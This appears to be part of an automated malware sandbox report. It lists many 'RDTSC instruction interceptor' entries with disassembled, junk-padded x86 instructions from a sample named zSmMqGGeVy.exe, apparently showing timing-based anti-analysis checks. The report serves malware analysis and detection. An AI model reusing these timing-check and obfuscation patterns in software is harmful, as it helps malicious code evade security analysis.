Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40119 second address: 4D4017A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9DF4F36027h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F9DF4F36029h 0x0000000f sbb si, 0EA6h 0x00000014 jmp 00007F9DF4F36021h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov ebx, dword ptr [eax+10h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9DF4F3601Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4017A second address: 4D401C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF58A6BE7h 0x00000009 adc esi, 5AC37E8Eh 0x0000000f jmp 00007F9DF58A6BE9h 0x00000014 popfd 0x00000015 mov ax, CD97h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bx, 48FAh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D401C7 second address: 4D401EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9DF4F3601Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D401EA second address: 4D401F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D401F0 second address: 4D40288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9DF4F36029h 0x00000014 adc esi, 643AB436h 0x0000001a jmp 00007F9DF4F36021h 0x0000001f popfd 0x00000020 call 00007F9DF4F36020h 0x00000025 pop eax 0x00000026 popad 0x00000027 popad 0x00000028 mov esi, dword ptr [772406ECh] 0x0000002e pushad 0x0000002f mov edi, 4E3F6522h 0x00000034 pushfd 0x00000035 jmp 00007F9DF4F36023h 0x0000003a jmp 00007F9DF4F36023h 0x0000003f popfd 0x00000040 popad 0x00000041 test esi, esi 0x00000043 pushad 0x00000044 mov edx, eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40288 second address: 4D4029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jne 00007F9DF58A7C70h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4029D second address: 4D40324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9DF4F36024h 0x00000011 add esi, 3AE249A8h 0x00000017 jmp 00007F9DF4F3601Bh 0x0000001c popfd 0x0000001d mov ah, 58h 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007F9DF4F36020h 0x00000027 mov cx, AFA1h 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007F9DF4F3601Ch 0x00000032 call dword ptr [77210B60h] 0x00000038 mov eax, 766BE5E0h 0x0000003d ret 0x0000003e pushad 0x0000003f mov eax, 4C317F4Dh 0x00000044 mov cx, C349h 0x00000048 popad 0x00000049 push 00000044h 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F9DF4F3601Bh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40324 second address: 4D4036D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov bh, 5Dh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d mov ebx, esi 0x0000000f pushfd 0x00000010 jmp 00007F9DF58A6BE4h 0x00000015 add cl, FFFFFFF8h 0x00000018 jmp 00007F9DF58A6BDBh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, edi 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F9DF58A6BE0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4036D second address: 4D40373 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40373 second address: 4D40379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40379 second address: 4D4037D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4037D second address: 4D4039B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9DF58A6BE1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4039B second address: 4D4039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4039F second address: 4D403A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D403A5 second address: 4D403AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D403AB second address: 4D403AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D403AF second address: 4D403FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007F9DF4F36020h 0x00000011 push dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ch, bl 0x00000018 jmp 00007F9DF4F36026h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D403FA second address: 4D4040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9DF58A6BDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4049B second address: 4D404D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF4F36023h 0x00000009 sub ax, 076Eh 0x0000000e jmp 00007F9DF4F36029h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D404D3 second address: 4D404E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov esi, eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D404E1 second address: 4D404E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D404E6 second address: 4D4051D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F9DF58A6BE6h 0x00000010 je 00007F9E67D25D71h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov di, 22DEh 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4051D second address: 4D405A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 0Bh 0x00000005 jmp 00007F9DF4F36027h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d sub eax, eax 0x0000000f jmp 00007F9DF4F3601Fh 0x00000014 mov dword ptr [esi], edi 0x00000016 jmp 00007F9DF4F36026h 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e jmp 00007F9DF4F36020h 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007F9DF4F36020h 0x0000002b mov dword ptr [esi+0Ch], eax 0x0000002e pushad 0x0000002f mov si, B62Dh 0x00000033 mov bx, ax 0x00000036 popad 0x00000037 mov eax, dword ptr [ebx+4Ch] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D405A0 second address: 4D405B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D405B1 second address: 4D405B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D405B7 second address: 4D405D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D405D9 second address: 4D405F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D405F4 second address: 4D40621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9DF58A6BDFh 0x00000008 push esi 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+50h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9DF58A6BE1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40621 second address: 4D40627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40627 second address: 4D4064A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b jmp 00007F9DF58A6BDFh 0x00000010 mov eax, dword ptr [ebx+54h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4064A second address: 4D4064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4064E second address: 4D40654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40654 second address: 4D40692 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF4F36028h 0x00000009 sub ah, FFFFFFD8h 0x0000000c jmp 00007F9DF4F3601Bh 0x00000011 popfd 0x00000012 mov esi, 67C6148Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+18h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40692 second address: 4D40697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40697 second address: 4D406E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9DF4F3601Eh 0x00000013 xor al, FFFFFF98h 0x00000016 jmp 00007F9DF4F3601Bh 0x0000001b popfd 0x0000001c mov eax, 296A684Fh 0x00000021 popad 0x00000022 mov dword ptr [esi+1Ch], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D406E2 second address: 4D406E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D406E6 second address: 4D406EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D406EC second address: 4D4079C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 call 00007F9DF58A6BE0h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+5Ch] 0x00000011 pushad 0x00000012 call 00007F9DF58A6BE7h 0x00000017 mov edx, esi 0x00000019 pop ecx 0x0000001a pushfd 0x0000001b jmp 00007F9DF58A6BE5h 0x00000020 sbb si, B2F6h 0x00000025 jmp 00007F9DF58A6BE1h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esi+20h], eax 0x0000002f pushad 0x00000030 push ecx 0x00000031 mov ah, dl 0x00000033 pop esi 0x00000034 jmp 00007F9DF58A6BE5h 0x00000039 popad 0x0000003a mov eax, dword ptr [ebx+60h] 0x0000003d jmp 00007F9DF58A6BDEh 0x00000042 mov dword ptr [esi+24h], eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F9DF58A6BE7h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4079C second address: 4D40886 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F36029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9DF4F3601Ch 0x00000013 adc cl, 00000038h 0x00000016 jmp 00007F9DF4F3601Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F9DF4F36028h 0x00000022 add eax, 0D83FD98h 0x00000028 jmp 00007F9DF4F3601Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov dword ptr [esi+28h], eax 0x00000032 jmp 00007F9DF4F36026h 0x00000037 mov eax, dword ptr [ebx+68h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F9DF4F3601Eh 0x00000041 sub ah, 00000028h 0x00000044 jmp 00007F9DF4F3601Bh 0x00000049 popfd 0x0000004a pushfd 0x0000004b jmp 00007F9DF4F36028h 0x00000050 add esi, 6121B188h 0x00000056 jmp 00007F9DF4F3601Bh 0x0000005b popfd 0x0000005c popad 0x0000005d mov dword ptr [esi+2Ch], eax 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F9DF4F36025h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40886 second address: 4D408DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF58A6BE7h 0x00000009 jmp 00007F9DF58A6BE3h 0x0000000e popfd 0x0000000f call 00007F9DF58A6BE8h 0x00000014 pop eax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c pushad 0x0000001d mov si, dx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D408DB second address: 4D408DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D408DF second address: 4D40987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov word ptr [esi+30h], ax 0x0000000b jmp 00007F9DF58A6BE0h 0x00000010 mov ax, word ptr [ebx+00000088h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F9DF58A6BDEh 0x0000001e sub eax, 6E559638h 0x00000024 jmp 00007F9DF58A6BDBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F9DF58A6BE8h 0x00000030 sub ax, 9098h 0x00000035 jmp 00007F9DF58A6BDBh 0x0000003a popfd 0x0000003b popad 0x0000003c mov word ptr [esi+32h], ax 0x00000040 pushad 0x00000041 mov si, B86Bh 0x00000045 pushfd 0x00000046 jmp 00007F9DF58A6BE0h 0x0000004b or esi, 72283AF8h 0x00000051 jmp 00007F9DF58A6BDBh 0x00000056 popfd 0x00000057 popad 0x00000058 mov eax, dword ptr [ebx+0000008Ch] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40987 second address: 4D4098D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D4098D second address: 4D40993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40993 second address: 4D40997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40997 second address: 4D409BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b jmp 00007F9DF58A6BE0h 0x00000010 mov eax, dword ptr [ebx+18h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov eax, edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D409BB second address: 4D409C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D409C1 second address: 4D409C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D409C5 second address: 4D40A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9DF4F3601Dh 0x00000017 add eax, 352E7A56h 0x0000001d jmp 00007F9DF4F36021h 0x00000022 popfd 0x00000023 mov si, C7C7h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40A08 second address: 4D40AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F9DF58A6BDFh 0x0000000c jmp 00007F9DF58A6BE3h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov eax, dword ptr [ebx+1Ch] 0x00000018 pushad 0x00000019 mov si, D9BBh 0x0000001d jmp 00007F9DF58A6BE0h 0x00000022 popad 0x00000023 mov dword ptr [esi+3Ch], eax 0x00000026 pushad 0x00000027 pushad 0x00000028 movzx ecx, dx 0x0000002b mov cx, bx 0x0000002e popad 0x0000002f pushfd 0x00000030 jmp 00007F9DF58A6BE5h 0x00000035 and al, 00000026h 0x00000038 jmp 00007F9DF58A6BE1h 0x0000003d popfd 0x0000003e popad 0x0000003f mov eax, dword ptr [ebx+20h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F9DF58A6BE8h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40AA5 second address: 4D40AB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF4F3601Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40AB4 second address: 4D40AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9DF58A6BDDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40AE3 second address: 4D40B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9DF4F36027h 0x00000009 and si, ABCEh 0x0000000e jmp 00007F9DF4F36029h 0x00000013 popfd 0x00000014 mov edx, esi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9DF4F36024h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40B40 second address: 4D40B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9DF58A6BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40B4F second address: 4D40B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40B54 second address: 4D40BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 1FB60EA8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push 00000001h 0x0000000e jmp 00007F9DF58A6BE7h 0x00000013 nop 0x00000014 pushad 0x00000015 mov ax, 66ABh 0x00000019 mov ah, C2h 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F9DF58A6BDAh 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F9DF58A6BE7h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BA7 second address: 4D40BAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BAF second address: 4D40BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 lea eax, dword ptr [ebp-10h] 0x0000000a jmp 00007F9DF58A6BE7h 0x0000000f nop 0x00000010 jmp 00007F9DF58A6BE6h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BEE second address: 4D40BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BF2 second address: 4D40BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BF6 second address: 4D40BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40BFC second address: 4D40C02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C02 second address: 4D40C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C06 second address: 4D40C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C15 second address: 4D40C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C19 second address: 4D40C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zSmMqGGeVy.exeRDTSC instruction interceptor: First address: 4D40C40 second address: 4D40C44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
